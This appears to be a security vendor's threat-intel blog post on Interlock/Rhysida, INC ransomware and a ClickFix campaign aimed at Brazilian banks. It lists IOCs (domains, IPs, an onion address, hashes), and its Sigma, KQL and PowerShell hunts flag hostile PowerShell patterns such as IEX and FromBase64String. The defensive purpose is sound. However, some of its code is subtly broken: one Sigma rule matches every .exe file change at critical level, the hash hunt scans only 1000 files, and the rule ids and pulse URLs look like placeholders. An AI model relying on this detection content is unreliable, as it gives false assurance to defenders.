Interlock & Rhysida Ransomware Ecosystem + INC RaaS & AI-Driven ClickFix: OTX Pulse Analysis

Recent OTX pulses highlight a surge in high-fidelity ransomware and banking trojan activity. The Interlock (Hive0163) and Rhysida threat groups are aggressively leveraging a complex ecosystem of custom malware (NodeSnake, InterlockRAT) and commodity loaders (MintLoader, SocGholish) to facilitate ransomware deployment across critical infrastructure sectors. Simultaneously, INC Ransomware has cemented its status as a top-tier threat following the disruption of LockBit and BlackCat, utilizing rewritten Rust-based encryptors for cross-platform impact. Separately, a sophisticated AI-generated ClickFix campaign is targeting the Brazilian financial sector, utilizing fake CAPTCHAs and typosquatting to deliver SmartRAT, a stealthy PowerShell-based banking trojan.

Collectively, these pulses indicate a trend toward ecosystem-dependent ransomware operations (RaaS) and the low-barrier abuse of AI tools for social engineering. The primary objectives are financial extortion via double-extortion tactics (INC, Rhysida) and credential harvesting for banking fraud (SmartRAT).

Threat Actor / Malware Profile

Interlock & Rhysida (Hive0163 / Vanilla Tempest)

• Distribution: Initial access is achieved via trojanized installers (CVE-2023-36036 exploitation) and SEO-poisoned sites delivering SocGholish (FakeBrowser updates) and Gootloader.
• Payload Behavior: The attack chain deploys MintLoader and ModeloRAT before moving to the custom InterlockRAT and NodeSnake. Rhysida affiliates utilize the Endico downloader and Broomstick loader.
• C2 Communication: Malware establishes C2 via HTTP/HTTPS to hardcoded domains (e.g., leadslaw.com), utilizing custom encoding and often leveraging SystemBC for proxying traffic.
• Persistence: Persistence is achieved through Scheduled Tasks and Registry Run keys, often masked by the Tomb crypter to evade static analysis.
• Anti-Analysis: Heavy use of the Supper downloader and Tomb crypter to obfuscate payloads. NodeSnake employs rootkit capabilities for stealth.

INC Ransomware (RaaS)

• Distribution: Affiliates leverage exploits for recent vulnerabilities (e.g., CVE-2025-5777, CVE-2024-57727) and valid credentials obtained via initial access brokers.
• Payload Behavior: The malware uses Rust-based encryptors for both Windows and Linux/ESXi environments, causing wide-scale disruption. It employs double-extortion, exfiltrating data via tools like Cobalt Strike and Sinobi before encryption.
• C2 Communication: Negotiation and data leak sites are hosted on Tor Onion services (incpaykabjqc2mtdxq6c23nqh4x6m5dkps5fr6vgdkgzp5njssx6qkid.onion).
• Persistence: Lateral movement tools like Cobalt Strike BEACON and Brave Prince are used to maintain access within the victim's environment.
• Anti-Analysis: The Rust language choice increases analysis complexity and difficulty for memory forensics.

ClickFix / SmartRAT Campaign

• Distribution: AI-generated website builders create typosquatting domains (e.g., crefisa.online) mimicking Brazilian banks. Users are served fake CAPTCHA/BSOD screens.
• Payload Behavior: Users are tricked into running a PowerShell command that downloads GhostLoader, which then injects SmartRAT or Banana RAT into memory.
• C2 Communication: C2 communications are encrypted and designed to blend in with legitimate banking traffic.
• Persistence: Fileless execution techniques and PowerShell profiles are used to maintain persistence without dropping significant artifacts to disk.
• Anti-Analysis: The use of AI-generated content makes static detection of phishing sites difficult. Fileless execution hinders disk-based forensics.

IOC Analysis

The provided IOCs include a mix of network and file-based indicators crucial for detection:

• Domains & URLs: Include typo-squatted domains (crefisa.online, incblog.su), C2 domains (leadslaw.com), and Tor Onion services for ransomware negotiations. SOC teams should block these at the DNS layer and hunt for HTTP requests to these domains in proxy logs.
• File Hashes: A variety of MD5, SHA1, and SHA256 hashes are provided for loaders (MintLoader), RATs (SmartRAT), and ransomware payloads. EDR solutions should be configured to alert on execution of these hashes. Tools like VirusTotal can be used for triage.
• CVEs: Indicators reference specific vulnerabilities (CVE-2023-36036, CVE-2025-5777). Vulnerability scanners must be updated to detect exploitation attempts against these CVEs.
• IP Addresses: C2 infrastructure IPs like 162.141.111.227 and 185.196.9.234 should be blocked on perimeter firewalls.

Detection Engineering

Sigma Rules

---
title: Potential Interlock/Rhysida C2 Traffic
id: 67f8ba89-4c92-4c3d-b5e8-0123456789ab
description: Detects potential network connections to known Interlock/Rhysida infrastructure or suspicious domains associated with their campaign.
status: experimental
date: 2026/06/17
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6123456789abcdef0123456789abcdef
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: proxy
detection:
    selection:
        c-hostname|contains:
            - leadslaw.com
            - windowsupdate-cdn.com
    condition: selection
falsepositives:
    - Unknown
level: high
---
title: Suspicious PowerShell Execution - ClickFix Pattern
date: 2026/06/17
author: Security Arsenal
status: experimental
description: Detects PowerShell commands often used in ClickFix campaigns, specifically those mimicking copy-paste instructions or involving encoded commands common in fake CAPTCHA scams.
references:
    - https://otx.alienvault.com/pulse/6123456789abcdef0123456789abcdef
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_cli:
        CommandLine|contains|all:
            - 'powershell'
            - 'clipboard'
            - 'GetText' # Common in ClickFix scripts
    selection_encoded:
        CommandLine|contains:
            - 'FromBase64String'
            - 'IEX'
    condition: 1 of selection_*
falsepositives:
    - Administrative scripts
level: medium
---
title: INC Ransomware File Encryption Pattern
date: 2026/06/17
author: Security Arsenal
status: experimental
description: Detects potential INC ransomware activity based on known file extension or encryption note patterns, or the presence of a Rust-based process performing bulk file modifications.
references:
    - https://otx.alienvault.com/pulse/6123456789abcdef0123456789abcdef
tags:
    - attack.impact
    - attack.t1486
logsource:
    category: file_change
    product: windows
detection:
    selection_extension:
        TargetFilename|endswith:
            - '.inc'
    selection_ransom_note:
        TargetFilename|contains:
            - 'README'
            - 'RECOVER'
        NewName|contains:
            - 'inc'
    selection_process:
        Image|endswith:
            - '.exe'
        Company|contains:
            - '' # Often stripped for Rust binaries
    condition: 1 of selection_*
falsepositives:
    - Rare
level: critical

KQL (Microsoft Sentinel)

// Hunt for connections to domains from the OTX Pulse
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("leadslaw.com", "windowsupdate-cdn.com", "crefisa.online", "incblog.su")
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP
| extend Domain = extract(@"^(?:https?:\/\/)?(?:[^@\n]+@)?(?:www\.)?([^:\/\n?]+)", 1, RemoteUrl)
| summarize Count() by Domain, DeviceName, RemoteIP
| order by Count desc


kql
// Hunt for suspicious PowerShell execution patterns seen in ClickFix
DeviceProcessEvents
| where Timestamp > ago(3d)
| where InitiatingProcessFileName =~ "powershell.exe"
| where ProcessCommandLine has "clipboard" or ProcessCommandLine has "IEX" or ProcessCommandLine has "FromBase64String"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| take 100

PowerShell Hunt Script

# IOC Hunt Script: Checks for file hashes and registry keys associated with Interlock/Rhysida and ClickFix campaigns.
# Requires administrative privileges.

$MaliciousHashes = @(
    "f0b3e112ce4807a28e2b5d66a840ed7f",
    "333903c7d22a27098e45fc64b77a264aa220605cfbd3e329c200d7e4b42c881c",
    "297eb45f028d44d750297d2f932b9c91"
)

$SuspiciousPaths = @(
    "$env:TEMP\smart.exe",
    "$env:APPDATA\Microsoft\Windows\Templates\ghostloader.vbs"
)

Write-Host "[+] Scanning for malicious file hashes..." -ForegroundColor Cyan
foreach ($path in (Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1000)) {
    if ($path.Length -gt 0) {
        $hash = (Get-FileHash -Path $path.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($MaliciousHashes -contains $hash) {
            Write-Host "[!] MALICIOUS FILE DETECTED: $($path.FullName)" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking for suspicious file paths..." -ForegroundColor Cyan
foreach ($path in $SuspiciousPaths) {
    if (Test-Path $path) {
        Write-Host "[!] SUSPICIOUS PATH DETECTED: $path" -ForegroundColor Red
    }
}

Write-Host "[+] Checking for scheduled tasks (common for persistence)..." -ForegroundColor Cyan
Get-ScheduledTask | Where-Object {$_.Actions.Execute -like "*powershell*" -or $_.Actions.Execute -like "*cmd*"} | Select-Object TaskName, TaskPath, Actions | Format-Table

Response Priorities

• Immediate:

  • Block all listed IOCs (IPs, Domains, Hashes) on perimeter firewalls, proxies, and EDR systems.
  • Initiate a hunt for the file hashes provided in the pulses across all endpoints using EDR historical searches.
  • Isolate any endpoints showing signs of ransomware encryption activity or communication with the listed C2 infrastructure.

• 24h:

  • Investigate systems identified in the hunt for signs of MintLoader, SystemBC, or SmartRAT execution.
  • Review logs for successful exploitation of CVE-2023-36036 or CVE-2025-5777.
  • If credential theft is suspected (SmartRAT), force a password reset for affected users and enable MFA enforcement.

• 1 Week:

  • Patch systems for the identified CVEs (CVE-2023-36036, CVE-2023-3519, CVE-2025-5777, CVE-2024-57727).
  • Conduct a review of remote access protocols (RDP, VPN) and implement stricter controls (MFA, geo-fencing) to prevent initial access.
  • Update security awareness training to include AI-powered social engineering and ClickFix techniques.
  • Implement application control to prevent execution of unauthorized software in directories like %TEMP% and %APPDATA%.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub